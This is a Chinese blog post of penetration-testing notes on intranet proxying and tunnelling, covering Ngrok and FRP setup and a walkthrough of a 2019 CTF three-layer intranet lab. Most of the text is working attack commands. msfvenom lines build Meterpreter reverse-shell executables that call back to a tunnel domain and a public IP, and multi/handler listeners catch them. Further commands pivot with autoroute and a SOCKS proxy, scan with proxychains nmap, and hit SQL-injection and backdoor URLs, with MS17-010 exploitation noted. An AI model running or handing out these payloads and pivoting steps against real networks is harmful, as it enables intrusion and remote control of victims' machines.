1.内网安全代理技术

0x01.基础知识

1.内外网简单知识

常见的内网地址:
10.x.x.x
172.16.x.x---172.31.x.x
192.168.x.x

2.内网 1 和内网 2 通信问题

老王的个人电脑 (连接自己家wifi)
老李的个人电脑 (连接自己家wifi)

这个时候通过代理 , 让两个电脑的连接

3.正向反向协议通信连接问题

正向 : 对方有一个唯一的公网地址 , 你能够找到他
反向 : 对方只要能够出网 , 然后你有一个公网地址 , 他能找到你

4.内网穿透代理隧道技术说明

代理 : 解决的是网络通信问题
隧道 : 解决的是流量分析工具 , 流量检测工具 , 和防火墙相关过滤问题

两个功能是不一样的

0x02.内网穿透Ngrok

测试演示-两个内网通讯上线

image-20210921165111884

实验环境:两个不同的内网(有网络)实现穿透控制
1.注册-购买-填写-确认 http://www.ngrok.cc/
协议:http 本地端口:127.0.0.1:80

image-20210921165839162

image-20210921165948017

下载客户端

image-20210921170345581

记住你的隧道域名后面会用到 http://xxxxxxxxxxxx 和 隧道id xxsjdbswqdwe11324nsj

2.测试:内网 1 执行后门-免费主机处理-内网 2 监听-内网 2 接受器
./sunny clientid aa0676878c162ffc

3.msf生成后门
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o
test.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.76.132
set lport 4444
exploit

简单理解 : 你可以理解成在两个电脑之间搞了中介 , 中介负责传递你们之间传递的数据

0x03.内网穿透 Frp

自行搭建,方便修改,成本低,使用多样化,适合高富帅及隐私哥哥们

1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)
服务器修改配置文件 frps.ini:
[common]
bind_port = 6677

启动服务端:
./frps -c ./frps.ini

2.控制端-下载-解压-修改-启动
控制端修改配置文件 frpc.ini:
[common]
server_addr = 你的云主机 ip
server_port = 6677            #frpc 工作端口,必须和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555            #转发给本机的 5555
remote_port = 6000        #服务端用 6000 端口转发给本机

启动客户端:
./frpc -c ./frpc.ini

msf生成后门测试

msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.160.211 lport=6000 -f exe -o mm.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit

3.靶机运行 mm.exe 即可

0x04.CFS三层内网漫游安全测试演练

image-20210921171111010

来源 2019 某 CTF 线下赛真题内网结合 WEB 攻防题库,涉及 WEB 攻击,内网代理路由等技术,每台
服务器存在一个 Flag,获取每一个 Flag 对应一个积分,获取三个 Flag 结尾。

别被吓到了 , 实际上很简单 , 就是通过1攻击2, 2再攻击3

1.Target1

探针目标-利用 WEB 漏洞(TP5_RCE)-获取 webshell 权限-获取 Flag-Target2
1.生成后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -f elf >t1.elf

2.接受反弹:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.76.132
set LPORT 1111
exploit

3.信息收集及配置访问
获取网络接口:run get_local_subnets             # 返回当前机器的所有网卡
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.22.0/24  # 目标的网段 , 这样就可以和22段通信了 , 但是当前只有msf会话可以访问
开启本地代理:
use auxiliary/server/socks4a
set srvport 2222
exploit

4.利用本地代理接口访问测试
设置浏览器代理进行访问测试
linux:
配置 proxychains 后调用工具探针 Target2
/etc/proxychains.conf
socks4 192.168.76.132 2222
proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80
-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT:扫描 TCP 数据包已建立的连接 connect
windows:
利用代理工具 Proxifier 或 SocksCap64 载入代理进行进程访问测试

2.Target2

探针目标-利用 WEB 漏洞(SQL 注入)-后台获取 webshell 权限-获取 Flag-Target3
http://192.168.22.128/index.php?r=vul&keyword=1 #sql 注入
http://192.168.22.128/index.php?r=admini/public/login #后台
http://192.168.22.128/index.php?r=special #后门 shell
1.生成正向后门:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
2.访问接受:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit

受害主机执行t2.elf就可以拿到会话了

3.信息收集及配置访问
获取网络接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.33.0/24

3.Target3

traget3上面有ms-17-010漏洞 , 但是你要设置payload为正向连接 , 设置RHOST为目标主机地址 , 因为他不能反向连接你然后 run 就可以拿到会话了

posted @ 2021-12-20 19:20  Mn猿  阅读(188)  评论(0编辑  收藏  举报